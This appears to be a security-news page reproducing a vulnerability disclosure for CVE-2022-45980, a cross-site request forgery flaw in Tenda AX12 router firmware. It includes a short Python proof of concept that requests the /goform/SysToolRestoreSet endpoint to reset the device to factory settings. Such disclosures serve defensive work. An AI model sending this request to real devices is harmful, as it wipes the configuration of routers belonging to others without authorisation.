Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-45980: IOT-CVE/Tenda/AX12/6 at master · The-Itach1/IOT-CVE

Tenda AX12 V22.03.01.21_CN was discovered to contain a Cross-Site Request Forgery (CSRF) via /goform/SysToolRestoreSet .

CVE
#csrf#vulnerability#auth

Vulnerability description

Affect device:Tenda-AX12 V22.03.01.21_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Device reset to factory settings

Vulnerability cause

Provided /goform/SysToolRestoreSet interface function, under the premise of authentication, it allows remote attackers to restore the device to factory settings.

POC

On the premise of authentication, just visit this interface.

import requests

url = “http://ip/goform/SysToolRestoreSet”

r = requests.get(url)

print(r.content)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda